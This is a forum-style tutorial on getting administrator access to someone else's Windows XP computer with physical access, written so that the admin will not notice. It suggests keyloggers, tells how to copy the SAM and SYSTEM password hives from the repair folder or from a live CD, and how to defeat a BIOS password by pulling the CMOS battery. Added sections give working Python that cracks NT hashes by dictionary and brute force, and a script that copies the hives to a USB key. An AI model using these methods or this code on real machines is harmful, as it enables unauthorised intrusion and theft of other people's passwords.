Getting admin on a winXP computer with physical access - Submitted By: littlegreenguy 2008-08-19 10:44:22
OK, so you've got a computer you want to get into sitting right in front of you, and you want admin rights or somebody's password.
There are several ways of doing this.
I'm only going to go through ways that let you recover the existing password. There are other ways, but the admin is surely going to notice if his password has been changed. You *can* do it with an emergency boot CD that resets the password, but just changing it is all a bit script-kiddie.
1) The simplest means is a keylogger.
You can get a free one, Home Keylogger, at
http://www.spyarsenal.com/keylogger.
Alternatively, Perfect Keylogger is supposed to be good.
However, this only works if you already have some account on the machine, even a limited one, and then you have to wait for the admin to log in. Anti-virus may also recognise it, and a limited account may not be allowed to install programs at all.
2) Windows XP keeps a backup copy of the registry hives, including the SAM (the password file), in
[drive]:\windows\repair
It is written at install time and only refreshed if the administrator makes a repair/system-state backup, so it may be stale, but unlike the live hive it isn't locked and you can just copy it. Take the system file from the same folder as well: since Windows 2000 the hashes inside the SAM are encrypted with a boot key (SYSKEY) that lives in the SYSTEM hive, and the cracker needs that key to decode them.
Once you have both files, get Cain and Abel (http://www.oxid.it/) and import the hashes from the SAM file; Cain will ask for the boot key, which its Syskey Decoder can read out of the SYSTEM hive. Try a dictionary attack first; if that fails you will need to brute force it. If the dump shows LM hashes alongside the NT hashes (XP stores both by default for passwords under 15 characters), crack the LM ones: they are uppercased and split into two 7-character halves, so they fall far faster. Brute force can take a long time, so copy the files to your USB key or floppy disk and do the cracking at home.
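To make the "dictionary first, then brute force" step concrete, here is an added example in Python that is not from the post and not Cain's code: it computes NT hashes the way Windows does (MD4 over the UTF-16LE password, no salt) and runs both attacks over pwdump-style lines of the form user:rid:lmhash:nthash:::. The SAMPLE_DUMP lines, the WORDLIST and the charset are constructed for the demo; the hashes are already decoded, so the SYSKEY/boot-key step that Cain performs when importing a SAM file is assumed to have happened. MD4 is implemented inline because hashlib's md4 is often missing on current OpenSSL builds.

```python
import struct
from itertools import product

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 as specified in RFC 1320 (three rounds of 16 steps per 64-byte block)."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    # Padding: 0x80, zeros to 56 mod 64, then the bit length as 64-bit little-endian.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        # Each step updates A, D, C, B in turn; t is the register index, x/y/z the other three.
        for i in range(16):                                  # round 1
            t = (4 - i % 4) % 4
            x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
            v[t] = _rotl((v[t] + F(x, y, z) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
        for i in range(16):                                  # round 2
            t = (4 - i % 4) % 4
            x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
            k = (i % 4) * 4 + i // 4                         # word order 0,4,8,12,1,5,...
            v[t] = _rotl((v[t] + G(x, y, z) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
        for i in range(16):                                  # round 3
            t = (4 - i % 4) % 4
            x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
            v[t] = _rotl((v[t] + H(x, y, z) + X[r3_order[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); unsalted, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(line: str):
    """Split a pwdump-style line: user:rid:lmhash:nthash::: (as Cain and pwdump tools export)."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()


def dictionary_attack(target_nt: str, wordlist):
    for word in wordlist:
        if nt_hash(word) == target_nt:
            return word
    return None


def brute_force(target_nt: str, charset: str, max_len: int):
    """Exhaustive search, shortest candidates first; cost grows as len(charset) ** length."""
    for n in range(1, max_len + 1):
        for chars in product(charset, repeat=n):
            cand = "".join(chars)
            if nt_hash(cand) == target_nt:
                return cand
    return None


def crack(line: str, wordlist, charset="abcdefghijklmnopqrstuvwxyz", max_len=3):
    """Dictionary first, brute force as the fallback; returns (user, password or None, method)."""
    user, _, _, nt = parse_pwdump(line)
    found = dictionary_attack(nt, wordlist)
    method = "dictionary"
    if found is None:
        found = brute_force(nt, charset, max_len)
        method = "brute-force" if found is not None else "not found"
    return user, found, method


# Constructed sample dump (not real accounts). The LM field is the well-known "empty LM" value,
# meaning no LM hash was stored; the NT hashes are for "password" and "cat".
SAMPLE_DUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "bob:1003:aad3b435b51404eeaad3b435b51404ee:" + nt_hash("cat") + ":::",
]
WORDLIST = ["123456", "letmein", "password", "qwerty"]   # constructed mini wordlist


def demo():
    return [crack(line, WORDLIST) for line in SAMPLE_DUMP]


if __name__ == "__main__":
    for user, pw, how in demo():
        print(f"{user}: {pw!r} ({how})")
```

The brute-force stage is deliberately capped at three lowercase letters so the demo finishes quickly; in pure Python each MD4 costs on the order of tens of microseconds, which is exactly why the post suggests taking the files home rather than cracking on the target.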
3) The SAM file (the file that holds all of the logons and password hashes for Windows XP) is held open by the running system, so you can't simply copy it from inside Windows. Instead, boot an alternative operating system from CD, mount the Windows partition and copy it from there (take windows\system32\config\SYSTEM along with the SAM, since it holds the boot key).
Download the Auditor security collection from here:
http://new.remote-exploit.org/index.php/Auditor_main
When the computer is first booting up, hit "Delete" or whatever key the screen says to enter setup. You will need to move CD-ROM ahead of the hard drive (or network) in the boot order so that the machine boots the CD instead of Windows XP. If the BIOS asks for a password, you'll need a screwdriver.
Open the case (if it's a tower case you may only need to take off one side) and look on the motherboard for a coin-sized button cell, about 20 mm across. Flip it out, wait a minute or so, and put it back; many boards also have a clear-CMOS jumper next to it that does the same job. Close the case again and restart. Voila, no BIOS password. Bear in mind this wipes the other BIOS settings too (clock, boot order), which an admin may notice.
Since it's already been said in better detail than I could ever manage, this link has detailed instructions on obtaining the SAM file with the Auditor security collection, including a Flash video of the whole process:
http://www.irongeek.com/i.php?page=security/localsamcrack2
Any questions, PM or MSN me.
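What the live-CD step boils down to, as an added example that is not from the post, from Auditor or from the linked irongeek write-up: once the Windows partition is mounted from the live CD (for instance read-only at /mnt/win, an assumed mount point), this Python helper locates the SAM and SYSTEM hives, both the live copies under system32\config and the repair copies, matching each path component case-insensitively because NTFS paths are case-insensitive while Linux lookups are not. It copies whatever it finds to a destination such as a USB key and reports which SAM/SYSTEM pairs are complete enough to crack. demo() builds a constructed fake volume in a temporary directory (dummy files carrying only the 'regf' hive magic) so it runs without a real disk.

```python
import os
import shutil
import tempfile

# Hive locations relative to the mounted Windows volume. Labels are ours, not Windows names.
HIVE_PATHS = {
    "live_sam":      ("windows", "system32", "config", "sam"),
    "live_system":   ("windows", "system32", "config", "system"),
    "repair_sam":    ("windows", "repair", "sam"),
    "repair_system": ("windows", "repair", "system"),
}


def find_ci(root, parts):
    """Walk `parts` below `root`, matching each component case-insensitively; None if absent."""
    cur = root
    for part in parts:
        try:
            names = os.listdir(cur)
        except OSError:            # missing directory, or a file where a directory was expected
            return None
        match = next((n for n in names if n.lower() == part), None)
        if match is None:
            return None
        cur = os.path.join(cur, match)
    return cur


def collect_hives(mount_root, dest):
    """Copy every hive that exists to dest/<label>; returns {label: source path}."""
    os.makedirs(dest, exist_ok=True)
    found = {}
    for label, parts in HIVE_PATHS.items():
        src = find_ci(mount_root, parts)
        if src and os.path.isfile(src):
            shutil.copy2(src, os.path.join(dest, label))   # copy2 keeps the mtime, useful for judging staleness
            found[label] = src
    return found


def crackable_pairs(found):
    """A SAM is only useful together with the SYSTEM hive holding its boot key (SYSKEY)."""
    return [p for p in ("live", "repair") if f"{p}_sam" in found and f"{p}_system" in found]


def demo():
    """Constructed fake XP volume: live SAM+SYSTEM present, repair folder has only a SAM."""
    root = tempfile.mkdtemp()
    for rel in (("WINDOWS", "system32", "config", "SAM"),
                ("WINDOWS", "system32", "config", "SYSTEM"),
                ("WINDOWS", "repair", "sam")):
        path = os.path.join(root, *rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(b"regf" + b"\x00" * 60)    # dummy content; real hives start with 'regf'
    out = os.path.join(root, "usb")
    found = collect_hives(root, out)
    return sorted(found), crackable_pairs(found), sorted(os.listdir(out))


if __name__ == "__main__":
    print(demo())
```

On the real box the call is simply collect_hives("/mnt/win", "/mnt/usb/hives") with your own mount points; if crackable_pairs() comes back empty you copied a SAM without its SYSTEM hive and the cracker will have nothing to decode it with.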